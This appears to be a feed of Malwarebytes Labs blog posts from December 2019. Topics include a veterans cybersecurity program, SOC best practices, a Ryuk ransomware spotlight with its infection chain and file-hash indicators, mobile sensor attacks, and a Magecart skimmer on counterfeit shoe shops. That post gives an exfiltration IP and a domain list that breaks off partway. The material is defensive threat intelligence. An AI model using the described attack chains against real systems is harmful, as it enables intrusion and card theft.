Malware Bytes

New Women in CyberSecurity (WiCyS) veterans program aims to bridge skills gap, diversify sector

Malware Bytes Security - Fri, 12/13/2019 - 12:02pm

The cybersecurity industry has a problem: We have zero unemployment rate. Or so we’re told.

With experts predicting millions of job openings in the years to come—coupled with the industry’s projected growth of US$289.9 billion by 2026 and soaring cyberattacks against businesses—now is as good a time as any for organizations to face the problem of the alleged skills shortage and take action.

Because here’s the unspoken reality: Organizations may have problems filling IT roles, but it’s not for lack of available employees. Perhaps it’s simply a problem of overlooking the millions of applicants with transferable skills. That’s where Women in CyberSecurity aims to step in.

Women in CyberSecurity launches veterans program

Women in CyberSecurity (WiCyS), a not-for-profit organization, launched the Veteran’s Assistance Program this November with the goal of connecting female veterans to jobs in the cybersecurity industry and providing a support network for its members. The program aims to:

  • Eliminate barriers that may hinder a veteran job candidate from being employed
  • Grow the cybersecurity workforce by introducing more women into cybersecurity
  • Help female veterans navigate into the cybersecurity industry as they transition and re-adjust to civilian life
  • Offer female vets the opportunity, community support, and resources to launch a career and thrive in the field

Women in CyberSecurity isn’t the first or only organization that has looked to military veterans to help fill in vacant positions in cybersecurity. Palo Alto Networks recently launched a free cybersecurity training and certification initiative called Second Watch. The SANS Institute also opened the scholarship-based SANS CyberTalent VetSuccess Immersion Academy. Even Facebook partnered with CodePath.org and hundreds of students and professors last year to unveil the Facebook Cybersecurity University for Veterans in which 33 veterans were able to graduate from the camp.

But what sets the WiCyS Veteran’s Assistance Program apart is their intentionality and focus in bringing more female veterans into the fold. Although they don’t conduct cybersecurity trainings, they offer resources and more: professional development, career training, mentorship, and a dedicated support system that will be there for their members in the long run.

“We want to provide a community of sisterhood that understands what their challenges and needs are and match them to employers who also understand their needs and transferable skills,” says Dr. Amelia Estwick, founding member and vice president of the WiCyS Mid-Atlantic Affiliate.

WiCyS members who are female veterans are given an opportunity to receive a Veterans Fellowship Award, provided they are eligible.

The award, sponsored by the Craig Newmark Philanthropies, is exclusively for female veterans who (1) are interested in making a career in cybersecurity or (2) are already are in it but would like to further advance their career.

Applications for the award are still open until Sunday, December 15. Eligible candidates will start receiving notifications from December 22 onward.

The WiCyS Veteran Fellowship Award will be provided to selected eligible female veterans who are interested in or already working in cybersecurity. Applications are open until December 15. Visit https://t.co/GaL6Y7eJrq for more information! pic.twitter.com/qlbrebsWdO

— Women in CyberSecurity (@WiCySorg) November 15, 2019 This hard task of shifting

Although transition programs are set up to help military members rejoin the workforce, finding a job hasn’t been easy for most of them, even with their highly-specialized, STEM-related training and cybersecurity’s dire need for diverse, skilled workers. This frustrates Estwick, who herself is a US Army veteran working in cybersecurity as program manager of the National Cybersecurity Institute at Excelsior College.

“I kept hearing these numbers about lack of talent, and lack of diversity, and the skills gap, and I said, ‘Why do they keep saying these jobs aren’t filled when I talk to a lot of military women transitioning who say they can’t find a job?'” she recounts. “They have transferable skills that they’ve gained through the service. There’s no way in the world these women should have trouble finding jobs.”

Many former veterans already working in cybersecurity say that the industry is the best fit yet for those who served in the armed forces. The overlapping of cybersecurity and military terminologies and tactics alone merits this hand-in-glove relationship.

Not only are veterans armed with STEM-related knowledge and technical aptitude, Estwick asserts, they have also dealt with many of the same issues in privacy, compliance, and regulation we in cybersecurity deal with today. Furthermore, she says, they have more developed soft skills, such as teamwork, leadership, attention to detail, and communication—key skills they have carried with them from their time in the service.

An honorary salute

In our eyes, veterans are and will always be defenders and heroes. It shouldn’t surprise us to see them on the front lines of the digital world as well. For WiCyS, putting highly-skilled female veterans in view of organizations who are looking to fill in-demand positions is just the beginning.

“We’re dealing with female veterans, but eventually, we could add military spouses or other groups. There are so many other slices of the pie we want to add. But we need to identify what their needs are now. The more we have joining us, the better informed we are to address those needs,” says Estwick.

While transitioning to civilian life is a challenge to all former military members, female veterans in particular shouldn’t be bogged down by employment barriers—real and perceived—when planning to make a career in cybersecurity and grow in it.

“There’s this nasty fog over cybersecurity. You get a lot of women who feel they’re not technical enough, not good enough for the field. It’s a change of mindset.” Estwick counsels. “Don’t diminish yourself. You have extremely valuable talent, knowledge, skill, and ability that employers should be very proud to have.”

The post New Women in CyberSecurity (WiCyS) veterans program aims to bridge skills gap, diversify sector appeared first on Malwarebytes Labs.

Categories: Malware Bytes

5 tips for building an effective security operations center (SOC)

Malware Bytes Security - Fri, 12/13/2019 - 11:00am

Security is more than just tools and processes. It is also the people that develop and operate security systems. Creating systems in which security professionals can work efficiently and effectively with current technologies is key to keeping your data and networks secure. Many enterprise organizations understand this need and are attempting to meet it with the creation of their own security operations center (SOC).

SOCs can significantly improve the security of an organization, but they are not perfect solutions and can be challenging to implement. Lack of skilled staff and the absence of effective orchestration and automation are the biggest hurdles, according to a recent SANS survey. Despite these hurdles, more organizations are looking to follow in the footsteps of the enterprise and build SOCs. Read on to learn exactly what is a security operations center, and how to create an effective one.

What is a security operations center (SOC)?

A security operations center, or SOC, consists of a team of people who are responsible for monitoring systems, identifying security issues and incidents, and responding to events. They are also typically the ones responsible for evaluating and enforcing security policies. A SOC team is typically responsible for covering the whole organization, not just a single department. While it’s mostly been embraced by larger organizations, SOCs are useful for businesses of any size, since all organizations are vulnerable to cyberattack.

SOC team members typically include:

  • SOC Manager—leads team operations and helps determine budget and agenda. They also serve as team representatives, interacting with other managers and executives.
  • Security Analyst—organizes and interprets data from reports and audits. They conduct risk assessments and use threat intelligence to produce actionable insights.
  • Forensic Investigator—analyzes incident data for evidence and behavioral information. They can work with law enforcement post incident.
  • Incident Responder—creates and follows Incident Response Plans (IRPs). They also conduct initial investigations and threat assessments.
  • Compliance Auditor—ensures processes comply with regulations. They can also handle compliance reporting.

SOCs must be customizable to an organization’s needs. To meet these differing needs, several types of SOCs exist, including:

  • Internal—consists of in-house security professionals
  • Co-managed—consists of a combination of internal and third-party professionals
  • Managed—consists of third-party professionals working remotely
  • Command—manages and coordinates smaller SOCs; useful for large enterprises
How to build an effective SOC

Building an effective SOC requires understanding the needs of your organization, as well as its limitations. Once these needs and limitations are understood, you can begin applying the following best practices. 

1. Choose your team carefully

The effectiveness of your SOC is reliant on the team members you choose. They are responsible for keeping your systems secure and determining which resources are needed to do so. When choosing, you need to include members that cover a range of skill sets and expertise

Team members must be able to:

  • Monitor systems and manage alerts
  • Manage and resolve incidents
  • Analyze incidents and propose action
  • Hunt and detect threats 

To accomplish these tasks, team members must also have a variety of skills, both soft and hard. The most important among these include intrusion detection, reverse engineering, malware handling and identification, and crisis management.

Do not make the mistake of only evaluating technical skills when building your team. Team members are required to work together closely during high-stress situations. For this reason, it is important to select members who can effectively collaborate and communicate.

2. Increase visibility

Visibility is key to being able to successfully protect a system. Your SOC team needs to be aware of where data and systems are in order to protect them. They need to know the priority of data and systems, as well as who should be allowed access

Being able to appropriately prioritize your assets enables your SOC to effectively distribute its limited time and resources. Having clear visibility allows your SOC to easily spot attackers and limits places where attackers can hide. To be maximally effective, your SOC must be able to monitor your network and perform vulnerability scans 24/7.

3. Select tools wisely

Having ineffective or insufficient tools can seriously hinder the effectiveness of your SOC. To avoid this, select tools carefully to match your system needs and infrastructure. The more complex your environment is, the more important it is to have centralized tools. Your team should not have to piecemeal information for analysis or use different tools to manage each device.

The more discrete tools your SOC employs, the more likely information is to be overlooked or ignored. If security members need to access multiple dashboards or pull logs from multiple sources, information is more difficult to sort through and correlate. 

When selecting tools, make sure to evaluate and research each tool prior to selection. Security products can be incredibly expensive and difficult to configure. It doesn’t make sense to spend time or money on a product or service that doesn’t integrate well with your system.

When deciding which tools to incorporate, you need to consider endpoint protection, firewalls, automated application security, and monitoring solutions. Many SOCs make use of System Information and Event Management (SIEM) solutions. These tools can provide log management and increase security visibility. SIEM can also be helpful for correlating data between events and automating alerts. 

4. Develop a robust incident response plan (IRP)

An IRP is a plan that outlines a standardized way of detecting and responding to security incidents. It should incorporate system knowledge, like data priority, as well as existing security policies and processes. A well-crafted IRP enables faster detection and resolution of incidents. There are many templates and guides available to help you create an incident response plan. Using these resources can ensure that no aspects are missed in your plan. It can also speed up the creation process.

Once your plan is established, it is not enough to simply wait until an incident occurs. Your SOC should make sure to practice using the plan with incident drills. Doing so can increase their response confidence when a real incident arises. It can also uncover any flaws, inconsistencies, or inefficiencies in the plan. It is the SOC team’s responsibility to make sure that your IRP is kept up to date as systems, staff, and security processes change.

5. Consider adding managed service providers (MSPs)

Many organizations use managed service providers (MSPs) as part of their SOC strategy. Managed services can provide the expertise that is otherwise lacking in your team. These services can also ensure that your systems are continuously monitored and that all events have an immediate response. Unless you have multiple shifts covering your SOC, constant coverage is something you are unlikely to be able to accomplish on your own.

The most common use of managed SOC services are for penetration testing or threat research. These are time-consuming tasks that can take significant expertise and expensive tools. Rather than devoting limited time and budgets to cover these tasks, your SOC can benefit from outsourcing or collaborating with third-party teams.

Securing organizations with SOCs

Creating a security operations center can be daunting. After all, it is meant to be the first and last stop when it comes to system security. Despite this, you can create an effective SOC team that meets the unique needs of your organization. It takes time, effort, and careful assessment, but the reward is a confidently secure network. 

Start by using the best practices outlined here and pay special attention to team selection. The members you choose not only dictate the SOC processes and tools to be implemented, but ultimately, the overall effectiveness of your program.

The post 5 tips for building an effective security operations center (SOC) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Threat spotlight: The curious case of Ryuk ransomware

Malware Bytes Security - Thu, 12/12/2019 - 5:33pm

Ryuk. A name once unique to a fictional character in a popular Japanese comic book and cartoon series is now a name that appears in several rosters of the nastiest ransomware to ever grace the wild web.

For an incredibly young strain—only 15 months old—Ryuk ransomware gaining such notoriety is quite a feat to achieve. Unless the threat actors behind its campaigns call it quits, too—Remember GandCrab?—or law enforcement collars them for good, we can only expect the threat of Ryuk to loom large over organizations.

First discovered in mid-August 2018, Ryuk immediately turned heads after disrupting operations of all Tribune Publishing newspapers over the Christmas holiday that year. What was initially thought of as a server outage soon became clear to those affected that it was actually a malware attack. It was quarantined eventually; however, Ryuk re-infected and spread onto connected systems in the network because the security patches failed to hold when tech teams brought the servers back.

Big game hunting with Ryuk ransomware

Before the holiday attack on Tribune Publishing, Ryuk had been seen targeting various enterprise organizations worldwide, asking ransom payments ranging from 15 to 50 Bitcoins (BTC). That translates to between US$97,000 and $320,000 at time of valuation.

This method of exclusively targeting large organizations with critical assets that almost always guarantees a high ROI for criminals is called “big game hunting.” It’s not easy to pull off, as such targeted attacks also involve the customization of campaigns to best suit targets and, in turn, increase the likelihood of their effectiveness. This requires much more work than a simple “spray-and-pray” approach that can capture numerous targets but may not net such lucrative results.

For threat actors engaged in big game hunting, malicious campaigns are launched in phases. For example, they may start with a phishing attack to gather key credentials or drop malware within an organization’s network to do extensive mapping, identifying crucial assets to target. Then they might deploy second and third phases of attacks for extended espionage, extortion, and eventual ransom.

To date, Ryuk ransomware is hailed as the costliest among its peers. According to a report by Coveware, a first-of-its-kind incident response company specializing in ransomware, Ryuk’s asking price is 10 times the average, yet they also claim that ransoms are highly negotiable. The varying ways adversaries work out ransom payments suggests that there may be more than one criminal group who have access to and are operating Ryuk ransomware.

The who behind Ryuk

Accurately pinpointing the origin of an attack or malware strain is crucial, as it reveals as much about the threat actors behind attack campaigns as it does the payload itself. The name “Ryuk,” which has obvious Japanese ties, is not a factor to consider when trying to discover who developed this ransomware. After all, it’s common practice for cybercriminals to use handles based on favorite anime and manga characters. These days, a malware strain is more than its name.

Instead, similarities in code base, structure, attack vectors, and languages can point to relations between criminal groups and their malware families. Security researchers from Check Point found a connection between the Ryuk and Hermes ransomware strains early on due to similarities in their code and structure, an association that persists up to this day. Because of this, many have assumed that Ryuk may also have ties with the Lazarus Group, the same North Korean APT group that operated the Hermes ransomware in the past.

Recommended read: Hermes ransomware distributed to South Koreans via recent Flash zero-day

However, code likeness alone is insufficient basis to support the Ryuk/North Korean ties narrative. Hermes is a ransomware kit that is frequently peddled on the underground market, making it available for other cybercriminals to use in their attack campaigns. Furthermore, separate research from cybersecurity experts at CrowdStrike, FireEye, Kryptos Logic, and McAfee has indicated that the gang behind Ryuk may actually be of Russian origin—and not necessarily nation-state sponsored.

As of this writing, the origins of Ryuk ransomware can be attributed (with high confidence, per some of our cybersecurity peers) to two criminal entities: Wizard Spider and CryptoTech.

The former is the well-known Russian cybercriminal group and operator of TrickBot; the latter is a Russian-speaking organization found selling Hermes 2.1 two months before the $58.5 million cyber heist that victimized the Far Eastern International Bank (FEIB) in Taiwan. According to reports, this version of Hermes was used as a decoy or “pseudo-ransomware,” a mere distraction from the real goal of the attack.

Wizard Spider

Recent findings have revealed that Wizard Spider upgraded Ryuk to include a Wake-on-LAN (WoL) utility and an ARP ping scanner in its arsenal. WoL is a network standard that allows computing devices connected to a network—regardless of which operating system they run—to be turned on remotely whenever they’re turned off, in sleep mode, or hibernating.

ARP pinging, on the other hand, is a way of discovering endpoints in a LAN network that are online. According to CrowdStrike, these new additions reveal Wizard Spider’s attempts to reach and infect as many of their target’s endpoints as they can, demonstrating a persistent focus and motivation to increasingly monetize their victims’ encrypted data.

CryptoTech

Two months ago, Gabriela Nicolao (@rove4ever) and Luciano Martins (@clucianomartins), both researchers at Deloitte Argentina, attributed Ryuk ransomware to CryptoTech, a little-known cybercriminal group that was observed touting Hermes 2.1 in an underground forum back in August 2017. Hermes 2.1, the researchers say, is Ryuk ransomware.

The CryptoTech post about Hermes version 2.1 on the dark web in August 2017 (Courtesy of McAfee)

In a Virus Bulletin conference paper and presentation entitled Shinigami’s revenge: the long tail of the Ryuk ransomware, Nicolao and Martins presented evidence to this claim: In June 2018, a couple of months before Ryuk made its first public appearance, an underground forum poster expressed doubt on CryptoTech being the author of Hermes 2.1, the ransomware toolkit they were peddling almost a year ago that time. CryptoTech’s response was interesting, which Nicolao and Martins captured and annotated in the screenshot below.

CryptoTech: Yes, we developed Hermes from scratch.

The Deloitte researchers also noted that after Ryuk emerged, CryptoTech went quiet.

CrowdStrike has estimated that from the time Ryuk was deployed until January of this year, their operators have netted a total of 705.80 BTC, which is equivalent to US$5 million as of press time.

Ryuk ransomware infection vectors

There was a time when Ryuk ransomware arrived on clean systems to wreak havoc. But new strains observed in the wild now belong to a multi-attack campaign that involves Emotet and TrickBot. As such, Ryuk variants arrive on systems pre-infected with other malware—a “triple threat” attack methodology.

How the Emotet, TrickBot, and Ryuk triple threat attack works (Courtesy of Cybereason)

The first stage of the attack starts with a weaponized Microsoft Office document file—meaning, it contains malicious macro code—attached to a phishing email. Once the user opens it, the malicious macro will run cmd and execute a PowerShell command. This command attempts to download Emotet.

Once Emotet executes, it retrieves and executes another malicious payload—usually TrickBot—and collects information on affected systems. It initiates the download and execution of TrickBot by reaching out to and downloading from a pre-configured remote malicious host.

Once infected with TrickBot, the threat actors then check if the system is part of a sector they are targeting. If so, they download an additional payload and use the admin credentials stolen using TrickBot to perform lateral movement to reach the assets they wish to infect.

The threat actors then check for and establish a connection with the target’s live servers via a remote desktop protocol (RDP). From there, they drop Ryuk.

Systems infected with the Ryuk ransomware displays the following symptoms:

Presence of ransomware notes. Ryuk drops the ransom note, RyukReadMe.html or RyukReadMe.txt, in every folder where it has encrypted files.

The HTML file, as you can see from the screenshot above, contains two private email addresses that affected parties can use to contact the threat actors, either to find out how much they need to pay to get access back to their encrypted files or to start the negotiation process.

On the other hand, the TXT ransom note contains (1) explicit instructions laid out for affected parties to read and comply, (2) two private email addresses affected parties can contact, and (3) a Bitcoin wallet address. Although email addresses may vary, it was noted that they are all accounts served at Protonmail or Tutanota. It was also noted that a day after the unsealing of the indictment of two ransomware operators, Ryuk operators removed the Bitcoin address from their ransom notes, stating that it will be given to those affected once they are contacted via email.

There are usually two versions of the text ransom note: a polite version, which past research claims is comparable to BitPaymer’s due to certain similar phrasings; and a not-so-polite version.

Ryuk ransom notes. Left: polite version; Right: not-so-polite version BitPaymer ransom note: polite version (Courtesy of Coveware)
BitPaymer ransom note: not-so-polite version (Courtesy of Symantec)

Encrypted files with the RYK string attached to extension names. Ryuk uses a combination of symmetric (via the use of AES) and asymmetric (via the use of RSA) encryption to encode files. A private key, which only the threat actor can supply, is needed to properly decrypt files.

Encrypted files will have the .ryk file extension appended to the file names. For example, an encrypted sample.pdf and sample.mp4 files will have the sample.pdf.ryk and sample.mp4.ryk file names, respectively.

This scheme is effective, assuming that each Ryuk strain was tailor-made for their target organization.

While Ryuk encrypts files on affected systems, it avoids files with the extension .exe, .dll, and .hrmlog (a file type associated with Hermes). Ryuk also avoids encrypting files in the following folders:

  • AhnLab
  • Chrome
  • Microsoft
  • Mozilla
  • Recycle.bin
  • Windows
Protect your system from Ryuk

Malwarebytes continues to track Ryuk ransomware campaigns, protecting our business users with real-time anti-malware and anti-ransomware technology, as well as signature-less detection, which stops the attack earlier on in the chain. In addition, we protect against triple threat attacks aimed at delivering Ryuk as a final payload by blocking downloads of Emotet or TrickBot.

We recommend IT administrators take the following actions to secure and mitigate against Ryuk ransomware attacks:

  • Educate every employee in the organization, including executives, on how to correctly handle suspicious emails.
  • Limit the use of privilege accounts to only a select few in the organization.
  • Avoid using RDPs without properly terminating the session.
  • Implement the use of a password manager and single sign-on services for company-related accounts. Do away with other insecure password management practices.
  • Deploy an authentication process that works for the company.
  • Disable unnecessary share folders, so that in the event of a Ryuk ransomware attack, the malware is prevented from moving laterally in the network.
  • Make sure that all software installed on endpoints and servers is up to date and all vulnerabilities are patched. Pay particular attention to patching CVE-2017-0144, a remote code-execution vulnerability. This will prevent TrickBot and other malware exploiting this weakness from spreading.
  • Apply attachment filtering to email messages.
  • Disable macros across the environment.

For a list of technologies and operations that have been found to be effective against Ryuk ransomware attacks, you can go here.

Indicators of Compromise (IOCs)

Take note that professional cybercriminals sell Ryuk to other criminals on the black market as a toolkit for threat actors to build their own strain of the ransomware. As such, one shouldn’t be surprised by the number of Ryuk variants that are wreaking havoc in the wild. Below is a list of file hashes that we have seen so far:

  • cb0c1248d3899358a375888bb4e8f3fe
  • d4a7c85f23438de8ebb5f8d6e04e55fc
  • 3895a370b0c69c7e23ebb5ca1598525d
  • 567407d941d99abeff20a1b836570d30
  • c0d6a263181a04e9039df3372afb8016

As always—stay safe, everyone!

The post Threat spotlight: The curious case of Ryuk ransomware appeared first on Malwarebytes Labs.

Categories: Malware Bytes

The little-known ways mobile device sensors can be exploited by cybercriminals

Malware Bytes Security - Wed, 12/11/2019 - 12:51pm

The bevy of mobile device sensors in modern smartphones and tablets make them more akin to pocket-sized laboratories and media studios than mere communication devices. Cameras, microphones, accelerometers, and gyroscopes give incredible flexibility to app developers and utility to mobile device users. But the variety of inputs also give clever hackers new methods of bypassing conventional mobile security—or even collecting sensitive information outside of the device.

Anyone who is serious about security and privacy, both for themselves and for end users, should consider how these sensors create unique vulnerabilities and can be exploited by cybercriminals.

Hackers of every hat color have been exploiting mobile device sensors for years. In 2012, researchers developed malware called PlaceRider, which used Android sensors to develop a 3D map of a user’s physical environment. In 2017, researchers used a smart algorithm to unlock a variety of Android smartphones with near complete success within three attempts, even when the phones had fairly robust security defenses. 

But as updates have been released with patches for the most serious vulnerabilities, hackers in 2019 have responded by finding even more creative ways to use sensors to snag vulnerable data.

“Listening” to passwords

Researchers were able to learn computer passwords by accessing the sensors in a mobile device’s microphone. The Cambridge University and Linkoping University researchers created an artificial intelligence (AI) algorithm that analyzed typing sounds. Out of 45 people tested, their passwords were cracked seven times out of 27. The technique was even more effective on tablets, which were right 19 times out of 27, inside of 10 attempts.

“We showed that the attack can successfully recover PIN codes, individual letters, and whole words,” the researchers wrote. Consider how easily most mobile users grant permission for an app to access their device’s microphone, without considering the possibility that the sound of their tapping on the screen could be used to decipher passwords or other phrases.

While this type of attack has never happened in the wild, it’s a reminder for users to be extra cautious when allowing applications access to their mobile device’s mic—especially if there’s no clear need for the app’s functionality.

Eavesdropping without a microphone

Other analysts have discovered that hackers don’t need access to a device’s microphone in order to tap into audio. Researchers working at the University of Alabama at Birmingham and Rutgers University eavesdropped on audio played through an Android device’s speakerphone with just the accelerometer, the sensor used to detect the orientation of the device. They found that sufficiently loud audio can impact the accelerometer, leaking sensitive information about speech patterns.

The researchers dubbed this capability as “spearphone eavesdropping,” stating that threat actors could determine the gender, identity, or even some of the words spoken by the device owner using methods of speech recognition or reconstruction. Because accelerometers are always on and don’t require permissions to operate, malicious apps could record accelerometer data and playback audio through speech recognition software.

While an interesting attack vector that would be difficult to protect against—restricting access or usage of accelerometer features would severely limit the usability of smart devices—this vulnerability would require that cybercriminals develop a malicious app and persuade users to download it. Once on a user’s device, it would make much more sense to drop other forms of malware or request access to a microphone to pull easy-to-read/listen-to data.

Since modern-day users tend to pay little attention to permissions notices or EULAs, the advantage of permission-less access to the accelerometer doesn’t yet provide enough return on investment for criminals. However, we once again see how access to mobile device sensors for one functionality can be abused for other purposes.

Fingerprinting devices with sensors

In May, UK researchers announced they had developed a fingerprinting technique that can track mobile devices across the Internet by using easily obtained factory-set sensor calibration details. The attack, called SensorID, works by using calibration details from the accelerator, gyroscope, and magnetometer sensors that can track a user’s web-browsing habits. This calibration data can also be used to track users as they switch between browsers and third-party apps, hypothetically allowing someone to get a full view of what users are doing on their devices.

Apple patched the vulnerability in iOS 12.2, while Google has yet to patch the issue in Android.

Avoiding detection with the accelerometer 

Earlier this year, Trend Micro uncovered two malicious apps on Google Play that drop wide-reaching banking malware. The apps appeared to be basic tools called Currency Converter and BatterySaverMobi. These apps cleverly used motion sensors to avoid being spotted as malware. 

A device that generates no motion sensor information is likely an emulator or sandbox environment used by researchers to detect malware. However, a device that does generate motion sensor data tells threat actors that it’s a true, user-owned device. So the malicious code only runs when the device is in motion, helping it sneak past researchers who might try to detect the malware in virtual environments.

While the apps were taken down from Google Play, this evasive technique could easily be incorporated into other malicious apps on third-party platforms.

The mobile security challenges of the future

Mobile device sensors are especially vulnerable to abuse because no special permissions or escalations are required to access these sensors. 

Most end users are capable of using strong passwords and protecting their device with anti-malware software. However, they probably don’t think twice about how their device’s gyroscope is being used. 

The good news is that mobile OS developers are working to add security protections to sensors. Android Pie tightened security by limiting sensor and user input data. Apps running in the background on a device running Android Pie can’t access the microphone or camera. Additionally, sensors that use the continuous reporting mode, such as accelerometers and gyroscopes, don’t receive events.

That means that mobile security challenges of the future won’t be solved with traditional cryptographic techniques. As long as hackers are able to access sensors that detect and measure physical space, they’ll continue exploit that easy-to-access data to secure the sensitive information that they want.

As mobile devices expand their toolbox of sensors, that will create new vulnerabilities—and yet-to-be discovered challenges for security professionals.

The post The little-known ways mobile device sensors can be exploited by cybercriminals appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Hundreds of counterfeit online shoe stores injected with credit card skimmer

Malware Bytes Security - Tue, 12/10/2019 - 12:30pm

There’s a well-worn saying in security: “If it’s too good to be true, then it probably isn’t.” This can easily be applied to the myriad of online stores that sell counterfeit goods—and now attract secondary fraud in the form of a credit card skimmer.

Allured by great deals on brand names, many people end up buying products on dubious websites only to find out that what they paid for isn’t what they’re getting.

We recently identified a credit card skimmer injected into hundreds of fraudulent sites selling brand name shoes. Unfortunate shoppers may not only be disappointed with the faux merchandise, but they will also relinquish their personal and financial data to Magecart fraudsters.

Counterfeit shoes by the truckload

Think of the web as a never-ending whack-a-mole war between brands, security teams, and fraudsters—as legitimate companies work with security to take down one counterfeit site, another soon pops up.

One way fraudulent sites receive traffic is via forum spam. Crooks troll sporting and fitness forums and leave messages to entice users to visit the fake store:

Here’s that same counterfeit site selling Adidas, Nike, and other big brand name sneakers:

trainersnmd[.]com is hosted in Russia at 91.218.113[.]213. Looking at the 91.218.113.0/24 subnet, we can see many more domains used in the same counterfeit business.

Some of those domains were taken over and replaced with a serving notice. For example in May 2019, Adidas filed a complaint for injunctive relief and damages against hundreds of fake Adidas stores.

Mass credit card skimmer injection

The skimming code was appended to a JavaScript file called translate.js. (A full copy of the deobfuscated skimmer can be found here.)

Stolen data, including billing addresses and credit card numbers, is exfiltrated to a server in China at 103.139.113[.]34.

What’s interesting is that this is actually a massive compromise across several IP subnets:

A cursory look at several domains using Sucuri’s SiteCheck revealed they are using the same outdated software:

It’s likely a malicious scanner simply crawled those IP ranges and used the same vulnerability to compromise each and every one of those counterfeit sites.

Online shopping and its risks

Shopping online these days is akin to walking into a minefield, yet many people aren’t aware of the dangers lurking behind every corner.

Based on our crawlers, we see new e-commerce sites fall victim to web skimmers every day. Looking at our telemetry, we can also correlate the number of web blocks to shopping patterns, such as Black Friday and Cyber Monday events.

We saw an increase in credit card skimming activity for Black Friday and Cyber Monday, but not as much as anticipated.

Many online stores were running deals for some time prior, even since late Oct.#Magecart #skimming #BlackFriday #CyberMonday pic.twitter.com/0DEMFXwjPa

— MB Threat Intel (@MBThreatIntel) December 3, 2019

As we saw in this post, counterfeit sites pose a double threat, not only from obtaining illicit goods but also getting robbed of data by a different group of criminals.

While we cannot completely eliminate the threat of digital skimmers, here are some tips on how to reduce the risks associated with online shopping:

  • Make sure that your computer is malware-free and running the latest patches. Leverage a security product that offers web protection. Malwarebytes’ flagship anti-malware product, as well as its newly introduced (and free) Browser Guard extension for Chrome and Firefox can thwart Magecart-related skimmers by blocking malicious scripts and websites from loading, as well as exfiltrating, data.
  • If you are shopping on a site for the first time, check that it looks maintained. While this does not replace a thorough security scan, seeing notes such as “Copyright 2015” may indicate that the website is not really being looked after.
  • Minimize how often you enter your credit card data by relying on other payment methods instead. For example, large reliable online retailers, such as Amazon already have your payment details archived into your account. Other safe methods include Apply Pay or prepaid Visa or Mastercards.
  • Check your bank/credit card statements regularly to identify potentially fraudulent charges.
  • Help prevent further attacks by reporting any fraudulent activity (especially if you were victim) to law enforcement authorities.
Indicators of Compromise (IOCs)

Counterfeit sites injected with skimmer

180workshoe[.]com
1freshfoot[.]com
2018nmd4u[.]com
234learnshoe[.]com
270takeshoe[.]com
365daysshoe[.]com
5923shoe[.]com
97saleweekly[.]com
987lateshoe[.]com
adsmithfwt[.]com
acheterftwr[.]com
addrubber[.]com
airmaxweekly[.]com
allsizeshoe[.]com
adnkclub[.]com
ashshoeslink[.]com
apparentshoe[.]com
auflaufschuh[.]com
utgumnshoes[.]com
awsnkrs[.]com
bajasprecio[.]com
basketouve[.]com
bestkixify[.]com
beastsole[.]com
best7now[.]com
bestshoesbf[.]com
blanchenmd[.]com
blazersoldes[.]com
boostrunner[.]com
boutiquesnks[.]com
brandingsit[.]com
breakerun[.]com
cageforlock[.]com
cestboncony[.]com
caretosole[.]com
champrun95[.]com
chaussureplace[.]com
cisalfaports[.]com
chamdot[.]com
chaussureprofile[.]com
colourmvp[.]com
compraestilos[.]com
closerpremium[.]com
closerselect[.]com
continuefeet[.]com
comfyftwr[.]com
cusmakeit[.]com
couleurmvp[.]com
courtadv[.]com
damesbedoor[.]com
ddtows[.]com
deeruptshoe[.]com
descubra19[.]com
docvab[.]com
donnescontate[.]com
dividesneakers[.]com
donectory[.]com
dryyourfoot[.]com
easeweekly[.]com
easyfootrun[.]com
energeticshoe[.]com
elementsthat[.]com
entryonlike[.]com
eternalapt[.]com
evidentshoe[.]com
febdate[.]com
farbasefull[.]com
farbenrun[.]com
farvefit[.]com
fleunderride[.]com
fewusedit[.]com
footbester[.]com
footrunclub[.]com
footsweek[.]com
footstijl[.]com
footstil[.]com
footstylish[.]com
foreasyon[.]com
for1sell[.]com
freernshoe[.]com
futureitblue[.]com
futureoiwill[.]com
futurenishoes[.]com
futureyouto[.]com
gelbneu[.]com
geschenkein[.]com
getgshoes[.]com
getbetternl[.]com
goldsoldes[.]com
grauwearim[.]com
grijsentop[.]com
goingtopurchase[.]com
grigiotopsu[.]com
greyheel[.]com
gsnkrs[.]com
guldafdk[.]com
headrebajas[.]com
hererunner[.]com

hjrshoe[.]com
inikirun[.]us
iweardam[.]com
jtsportsde[.]com
justshopclub[.]com
kaiisko[.]com
kaufenftwr[.]com
kaischuhe[.]com
kickfrstore[.]com
kickscrewstore[.]com
kickstienda[.]com
kickvapor[.]com
kickswinkel[.]com
kixifyshop[.]com
kixifyrun[.]com
kixifystore[.]com
kleurmvp[.]com
kleurschuhe[.]com
laufschuhebeste[.]com
linrubsole[.]com
lobeskoruns[.]com
lony19[.]com
lowesthalf[.]com
luckyisport[.]com
maxformob[.]com
manifestshoe[.]com
maximummost[.]com
metyshoes[.]com
mjftoods[.]com
mindedshoe[.]com
monitornon[.]com
msnkrs[.]com
nairschoenen[.]com
nairchaussure[.]com
nairscarpe[.]com
nairschuhe[.]com
nettstil[.]com
netwhilesale[.]com
newseftwr[.]com
newfeetreal[.]com
newmaxreal[.]com
newshoesreal[.]com
newstylereal[.]com
newwholereal[.]com
nicestijl[.]com
nicestil[.]com
nieuwekaufe[.]com
nicestilebay[.]com
nicestylebay[.]com
niceventefr[.]com
nmdforfemme[.]com
nmdrosare[.]com
nieuwekaufen[.]com
nmd5club[.]com
nmdnoir[.]com
nmdpksneaker4u[.]com
nmdoriginals[.]com
nmdreplace4u[.]com
nmdtrainers[.]com
noticeableshoes[.]com
noteystore[.]com
nuevorunning[.]com
nrdunkzpa[.]com
nrunnersale[.]com
nouveauhaven[.]com
nuevoshoe[.]com
nuovehaven[.]com
obviousshoe[.]com
offwschuhe[.]com
oplev19[.]com
oroshoesit[.]com
ordinarytrend[.]com
oroboostpas[.]com
outlet3prix[.]com
outletsfire[.]com
particleprovide[.]com
paschernoir[.]com
perpetuallook[.]com
pearlshoeslink[.]com
perpetualfree[.]com
phlshoe[.]com
pickonsneakers[.]com
pinkshoeslink[.]com
ponashoes[.]com
porsneakers[.]com
premiumnuevo[.]com
poshseeking[.]com
profilesshoe[.]com
prophereshoe[.]com
psbeautytre[.]com
racersho[.]com
runnerfr[.]com
ozemetoen[.]com
rosakopen[.]com
run4kick[.]com
rubberplat[.]com
runnerdry[.]com
runstormon[.]com

saledksko[.]com
saldifire[.]com
sarezalando[.]com
scarpekingdom[.]com
scarpe-new[.]com
